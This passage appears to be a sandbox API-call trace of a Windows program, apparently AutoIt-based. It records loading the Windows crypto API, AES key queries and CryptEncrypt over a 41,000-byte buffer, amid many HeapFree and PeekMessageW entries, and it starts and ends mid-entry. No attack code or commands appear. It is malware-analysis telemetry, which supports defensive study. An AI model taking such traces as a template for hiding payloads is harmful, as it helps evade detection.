WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.749] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0178.749] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2808, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2808*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.751] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.751] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0178.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0178.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0178.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.752] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.752] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.752] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.752] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.752] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.753] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.753] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.753] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.754] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.755] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa052, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa060) returned 1 [0178.755] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.755] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.755] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.755] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.755] CharLowerBuffW (in: lpsz="byte[41057]", cchLength=0xb | out: lpsz="byte[41057]") returned 0xb [0178.755] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.757] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.757] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.757] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa052, dwBufLen=0xa060 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa060) returned 1 [0178.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.757] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.759] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.759] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.759] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.759] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.759] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.759] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.759] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.760] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.760] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.760] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.764] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.764] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.764] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.770] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.770] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.770] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0178.770] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.770] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.770] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0178.770] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.770] CryptDestroyKey (hKey=0x90af98) returned 1 [0178.771] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.771] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.771] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.771] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.771] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.771] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0178.771] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0178.800] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.800] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0178.800] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.800] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0178.800] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.800] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0178.800] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.800] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0178.800] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0178.801] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.801] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.801] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.801] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0178.801] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.801] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.801] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.801] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.801] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.801] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.801] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0178.801] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.801] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.801] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.801] FreeLibrary (hLibModule=0x74f20000) returned 1 [0178.801] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.801] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.801] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, 